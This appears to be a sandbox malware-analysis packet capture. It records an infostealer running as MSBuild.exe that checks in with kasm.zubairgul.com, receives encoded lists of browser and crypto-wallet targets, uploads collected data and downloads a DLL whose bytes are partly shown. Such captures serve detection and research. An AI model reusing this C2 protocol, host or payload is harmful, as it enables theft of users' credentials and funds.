Oct 8, 2024 20:47:51.098869085 CEST	1.1.1.1	192.168.2.5	0x9bc2	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:52.431262970 CEST	1.1.1.1	192.168.2.5	0xd9e4	No error (0)	sergei-esenin.com		172.67.206.204	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:52.431262970 CEST	1.1.1.1	192.168.2.5	0xd9e4	No error (0)	sergei-esenin.com		104.21.53.8	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:59.110129118 CEST	1.1.1.1	192.168.2.5	0x894a	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:59.110129118 CEST	1.1.1.1	192.168.2.5	0x894a	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49755	95.164.90.97	80	4788	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 20:47:18.892370939 CEST	93	OUT	GET / HTTP/1.1 Host: kasm.zubairgul.com Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 20:47:19.916579008 CEST	168	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 08 Oct 2024 18:47:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Oct 8, 2024 20:47:19.920522928 CEST	441	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEHDBAAFIDGDAAAAAAAA Host: kasm.zubairgul.com Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 34 46 36 41 46 31 39 36 30 41 31 36 33 33 30 34 37 39 38 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 63 63 39 63 37 65 61 65 62 66 64 66 32 61 38 63 63 30 35 38 36 64 37 34 31 39 64 36 65 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 2d 2d 0d 0a Data Ascii: ------IEHDBAAFIDGDAAAAAAAAContent-Disposition: form-data; name="hwid"8E4F6AF1960A1633047986-a33c7340-61ca------IEHDBAAFIDGDAAAAAAAAContent-Disposition: form-data; name="build_id"8ecc9c7eaebfdf2a8cc0586d7419d6ea------IEHDBAAFIDGDAAAAAAAA--
Oct 8, 2024 20:47:20.598676920 CEST	232	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 08 Oct 2024 18:47:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 39 35 37 38 37 31 37 30 62 64 38 62 64 37 65 63 62 37 63 35 63 33 39 62 31 39 33 38 65 39 63 63 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|95787170bd8bd7ecb7c5c39b1938e9cc\|1\|1\|1\|0\|0\|50000\|10
Oct 8, 2024 20:47:20.600085974 CEST	516	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEGCBAAFHDHDHJKEGCFC Host: kasm.zubairgul.com Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 45 47 43 42 41 41 46 48 44 48 44 48 4a 4b 45 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 37 38 37 31 37 30 62 64 38 62 64 37 65 63 62 37 63 35 63 33 39 62 31 39 33 38 65 39 63 63 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 41 41 46 48 44 48 44 48 4a 4b 45 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 63 63 39 63 37 65 61 65 62 66 64 66 32 61 38 63 63 30 35 38 36 64 37 34 31 39 64 36 65 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 41 41 46 48 44 48 44 48 4a 4b 45 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 41 41 46 48 44 48 44 48 4a 4b 45 47 43 46 43 2d 2d 0d 0a Data Ascii: ------IEGCBAAFHDHDHJKEGCFCContent-Disposition: form-data; name="token"95787170bd8bd7ecb7c5c39b1938e9cc------IEGCBAAFHDHDHJKEGCFCContent-Disposition: form-data; name="build_id"8ecc9c7eaebfdf2a8cc0586d7419d6ea------IEGCBAAFHDHDHJKEGCFCContent-Disposition: form-data; name="mode"1------IEGCBAAFHDHDHJKEGCFC--
Oct 8, 2024 20:47:21.244820118 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 08 Oct 2024 18:47:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 5a 70 64 6d 46 73 5a 47 6c 38 58 46 5a 70 64 6d 46 73 5a 47 6c 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 44 62 32 31 76 5a 47 38 67 52 48 4a 68 5a 32 39 75 66 46 78 44 62 [TRUNCATED] Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIERhdGF8Y2hyb21lfFZpdmFsZGl8XFZpdmFsZGlcVXNlciBEYXRhfGNocm9tZXxDb21vZG8gRHJhZ29ufFxDb21vZG9cRHJhZ29uXFVzZXIgRGF0YXxjaHJvbWV8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfENvY0NvY3xcQ29jQ29jXEJyb3dzZXJcVXNlciBEYXRhfGNocm9tZXxCcmF2ZXxcQnJhdmVTb2Z0d2FyZVxCcmF2ZS1Ccm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8Q2VudCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXxNaWNyb3NvZnQgRWRnZXxcTWljcm9zb2Z0XEVkZ2VcVXNlciBEYXRhfGNocm9tZXxNaWNyb3NvZnQgRWRnZSBDYW5hcnl8XE1pY3Jvc29mdFxFZGdlIFN4U1xVc2VyIERhdGF8Y2hyb21lfE1pY3Jvc29mdCBFZGdlIEJldGF8XE1pY3Jvc29mdFxFZGdlIEJldGFcVXNlciBEYXRhfGNocm9tZXxNaWNyb3NvZnQgRWRnZSBEZXZ8XE1pY3Jvc29mdFxFZGdlIERldlxVc2V [TRUNCATED]
Oct 8, 2024 20:47:21.245534897 CEST	491	IN	Data Raw: 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 52 55 55 4a 79 62 33 64 7a 5a 58 4a 38 58 46 52 6c 62 6d 4e 6c 62 6e 52 63 55 56 46 43 63 6d 39 33 63 32 56 79 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 Data Ascii: VXNlciBEYXRhfGNocm9tZXxRUUJyb3dzZXJ8XFRlbmNlbnRcUVFCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8Q3J5cHRvVGFiIEJyb3dzZXJ8XENyeXB0b1RhYiBCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8T3BlcmF8XE9wZXJhIFNvZnR3YXJlfG9wZXJhfE9wZXJhIEdYfFxPcGVyYSBTb2Z0d2FyZXxvcGVyYXxPcGVyYSB
Oct 8, 2024 20:47:21.245574951 CEST	491	IN	Data Raw: 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 52 55 55 4a 79 62 33 64 7a 5a 58 4a 38 58 46 52 6c 62 6d 4e 6c 62 6e 52 63 55 56 46 43 63 6d 39 33 63 32 56 79 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 Data Ascii: VXNlciBEYXRhfGNocm9tZXxRUUJyb3dzZXJ8XFRlbmNlbnRcUVFCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8Q3J5cHRvVGFiIEJyb3dzZXJ8XENyeXB0b1RhYiBCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8T3BlcmF8XE9wZXJhIFNvZnR3YXJlfG9wZXJhfE9wZXJhIEdYfFxPcGVyYSBTb2Z0d2FyZXxvcGVyYXxPcGVyYSB
Oct 8, 2024 20:47:21.247198105 CEST	516	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFBAECBAEGDGDHIEHIJJ Host: kasm.zubairgul.com Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 37 38 37 31 37 30 62 64 38 62 64 37 65 63 62 37 63 35 63 33 39 62 31 39 33 38 65 39 63 63 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 63 63 39 63 37 65 61 65 62 66 64 66 32 61 38 63 63 30 35 38 36 64 37 34 31 39 64 36 65 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 2d 2d 0d 0a Data Ascii: ------KFBAECBAEGDGDHIEHIJJContent-Disposition: form-data; name="token"95787170bd8bd7ecb7c5c39b1938e9cc------KFBAECBAEGDGDHIEHIJJContent-Disposition: form-data; name="build_id"8ecc9c7eaebfdf2a8cc0586d7419d6ea------KFBAECBAEGDGDHIEHIJJContent-Disposition: form-data; name="mode"2------KFBAECBAEGDGDHIEHIJJ--
Oct 8, 2024 20:47:21.868561029 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 08 Oct 2024 18:47:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 32 6c 6f 62 32 5a 6c 59 33 77 78 66 44 42 38 4d 48 78 43 61 57 35 68 62 6d 4e 6c 51 32 68 68 61 57 35 58 59 57 78 73 5a 58 52 38 4d 58 78 6d 61 47 4a 76 61 47 6c 74 59 57 56 73 59 6d 39 6f 63 47 70 69 59 6d 78 6b 59 32 35 6e 59 32 35 68 63 47 35 6b [TRUNCATED] Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3wxfDB8MHxCaW5hbmNlQ2hhaW5XYWxsZXR8MXxmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHwxfDF8MHxZb3JvaXwxfGZmbmJlbGZkb2Vpb2hlbmtqaWJubWFkamllaGpoYWpifDF8MHwwfENvaW5iYXNlfDF8aG5mYW5rbm9jZmVvZmJkZGdjaWpubWhuZm5rZG5hYWR8MXwwfDF8R3VhcmRhfDF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDF8aVdhbGxldHwxfGtuY2NoZGlnb2JnaGVuYmJhZGRvampubmFvZ2ZwcGZqfDF8MHwwfFJvbmluV2FsbGV0fDF8Zm5qaG1raGhta2Jqa2thYm5kY25ub2dhZ29nYm5lZWN8MXwwfDB8TmVvTGluZXwxfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENsb3ZlcldhbGxldHwxfG5obmtia2dqaWtnY2lnYWRvbWtwaGFsYW5uZGNhcGprfDF8MHwwfExpcXVhbGl0eVdhbGxldHwxfGtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufDF8MHwwfFRlcnJhX1N0YXRpb258MXxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnwxfGRta2FtY2tub2drZ2NkZmhoYmRkY2doYW [TRUNCATED]
Oct 8, 2024 20:47:21.868572950 CEST	1236	IN	Data Raw: 6b 63 47 52 74 61 32 46 68 61 32 56 71 62 6d 68 68 5a 58 77 78 66 44 42 38 4d 48 78 51 62 32 78 35 62 57 56 7a 61 46 64 68 62 47 78 6c 64 48 77 78 66 47 70 76 61 6d 68 6d 5a 57 39 6c 5a 47 74 77 61 32 64 73 59 6d 5a 70 62 57 52 6d 59 57 4a 77 5a Data Ascii: kcGRta2Fha2VqbmhhZXwxfDB8MHxQb2x5bWVzaFdhbGxldHwxfGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZqYW9vbGFmfDF8MHwwfElDT05leHwxfGZscGljaWlsZW1naGJtZmFsaWNham9vbGhra2VuZmVsfDF8MHwwfENvaW45OHwxfGFlYWNoa25tZWZwaGVwY2Npb25ib29oY2tvbm9lZW1nfDF8MHwwfEVWRVIgV2FsbG
Oct 8, 2024 20:47:21.868578911 CEST	1236	IN	Data Raw: 76 59 57 52 6b 61 57 35 77 61 32 4a 68 61 58 77 78 66 44 46 38 4d 48 78 48 51 58 56 30 61 43 42 42 64 58 52 6f 5a 57 35 30 61 57 4e 68 64 47 39 79 66 44 42 38 61 57 78 6e 59 32 35 6f 5a 57 78 77 59 32 68 75 59 32 56 6c 61 58 42 70 63 47 6c 71 59 Data Ascii: vYWRkaW5wa2JhaXwxfDF8MHxHQXV0aCBBdXRoZW50aWNhdG9yfDB8aWxnY25oZWxwY2huY2VlaXBpcGlqYWxqa2JsYmNvYmx8MXwxfDF8VHJvbml1bXwxfHBubmRwbGNia2FrY3Bsa2pub2xnYmtkZ2ppa2plZG5tfDF8MHwwfFRydXN0IFdhbGxldHwxfGVnamlkamJwZ2xpY2hkY29uZGJjYmRuYmVlcHBnZHBofDF8MHwwfE
Oct 8, 2024 20:47:21.868686914 CEST	1236	IN	Data Raw: 70 63 32 55 67 4c 53 42 42 63 48 52 76 63 79 42 58 59 57 78 73 5a 58 52 38 4d 58 78 6f 59 6d 4a 6e 59 6d 56 77 61 47 64 76 61 6d 6c 72 59 57 70 6f 5a 6d 4a 76 62 57 68 73 62 57 31 76 62 47 78 77 61 47 4e 68 5a 48 77 78 66 44 42 38 4d 48 78 53 59 Data Ascii: pc2UgLSBBcHRvcyBXYWxsZXR8MXxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHwxfG9wZmdlbG1jbWJpYWphbWVwbm1sb2lqYnBvbGVpYW1hfDF8MHwwfE5pZ2h0bHl8MXxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5hbGtmYXwxfDB8MHxFY3RvIFdhbGxldHwxfGJnam
Oct 8, 2024 20:47:21.868696928 CEST	904	IN	Data Raw: 58 59 57 78 73 5a 58 52 38 4d 58 78 76 59 32 70 6b 63 47 31 76 59 57 78 73 62 57 64 74 61 6d 4a 69 62 32 64 6d 61 57 6c 68 62 32 5a 77 61 47 4a 71 5a 32 4e 6f 61 48 77 78 66 44 42 38 4d 48 78 57 5a 57 35 76 62 53 42 58 59 57 78 73 5a 58 52 38 4d Data Ascii: XYWxsZXR8MXxvY2pkcG1vYWxsbWdtamJib2dmaWlhb2ZwaGJqZ2NoaHwxfDB8MHxWZW5vbSBXYWxsZXR8MXxvamdnbWNobGdobmpsYXBtZmJuamhvbGZqa2lpZGJjaHwxfDB8MHxQdWxzZSBXYWxsZXQgQ2hyb21pdW18MXxjaW9qb2Nwa2NsZmZsb21iYmNmaWdjaWpqY2JrbWhhZnwxfDB8MHxNYWdpYyBFZGVuIFdhbGxldH
Oct 8, 2024 20:47:21.871103048 CEST	517	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKFIJJEGHDAEBGCAKJKF Host: kasm.zubairgul.com Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 37 38 37 31 37 30 62 64 38 62 64 37 65 63 62 37 63 35 63 33 39 62 31 39 33 38 65 39 63 63 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 63 63 39 63 37 65 61 65 62 66 64 66 32 61 38 63 63 30 35 38 36 64 37 34 31 39 64 36 65 61 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 2d 2d 0d 0a Data Ascii: ------BKFIJJEGHDAEBGCAKJKFContent-Disposition: form-data; name="token"95787170bd8bd7ecb7c5c39b1938e9cc------BKFIJJEGHDAEBGCAKJKFContent-Disposition: form-data; name="build_id"8ecc9c7eaebfdf2a8cc0586d7419d6ea------BKFIJJEGHDAEBGCAKJKFContent-Disposition: form-data; name="mode"21------BKFIJJEGHDAEBGCAKJKF--
Oct 8, 2024 20:47:22.496416092 CEST	282	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 08 Oct 2024 18:47:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180
Oct 8, 2024 20:47:22.613893986 CEST	186	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBFIJEGIDBGIECAKKEGD Host: kasm.zubairgul.com Content-Length: 6921 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 20:47:22.613949060 CEST	6921	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 37 38 37 31 Data Ascii: ------CBFIJEGIDBGIECAKKEGDContent-Disposition: form-data; name="token"95787170bd8bd7ecb7c5c39b1938e9cc------CBFIJEGIDBGIECAKKEGDContent-Disposition: form-data; name="build_id"8ecc9c7eaebfdf2a8cc0586d7419d6ea------CBFIJEGIDBGIEC
Oct 8, 2024 20:47:23.392240047 CEST	175	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 08 Oct 2024 18:47:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0
Oct 8, 2024 20:47:23.394754887 CEST	100	OUT	GET /sql.dll HTTP/1.1 Host: kasm.zubairgul.com Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 20:47:23.651463032 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 08 Oct 2024 18:47:23 GMT Content-Type: application/octet-stream Content-Length: 2459136 Last-Modified: Fri, 24 Nov 2023 13:43:06 GMT Connection: keep-alive ETag: "6560a86a-258600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 69 a8 60 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 25 00 d4 20 00 00 ca 04 00 00 00 00 00 7b 44 00 00 00 10 00 00 00 f0 20 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZYPELi`e!% {D %@#6$($$`#8x#@$.textG `.rdata" $ @@.data4\| $b#@.idata$^$@@.00cfg$p$@@.rsrc$r$@@.reloc5$$@B
Oct 8, 2024 20:47:23.651488066 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc cc cc cc cc e9 8b 17 1c 00 e9 a0 11 1d 00 e9 bf ab 1b 00 e9 a2 44 1c 00 e9 3b 27 1d 00 e9 cc 5a 1d 00 e9 95 a9 1c 00 e9 Data Ascii: D;'ZRxs\tNg4^0Gb&OlpjBT%{rf:%oR}r
Oct 8, 2024 20:47:23.651500940 CEST	1236	IN	Data Raw: e9 de dd 1a 00 e9 38 5b 1e 00 e9 03 3c 1c 00 e9 d8 5a 1b 00 e9 36 f6 1d 00 e9 a1 53 1c 00 e9 fd 8f 1c 00 e9 5c c1 1b 00 e9 7e a0 1a 00 e9 cf ff 1e 00 e9 f6 9f 1a 00 e9 68 00 1e 00 e9 b8 b0 1f 00 e9 32 5a 1d 00 e9 43 81 1e 00 e9 c5 06 1b 00 e9 b0 Data Ascii: 8[<Z6S\~h2ZC;<V.++-9nq(+:FEska9_U`GiY! O<'_zBo0q
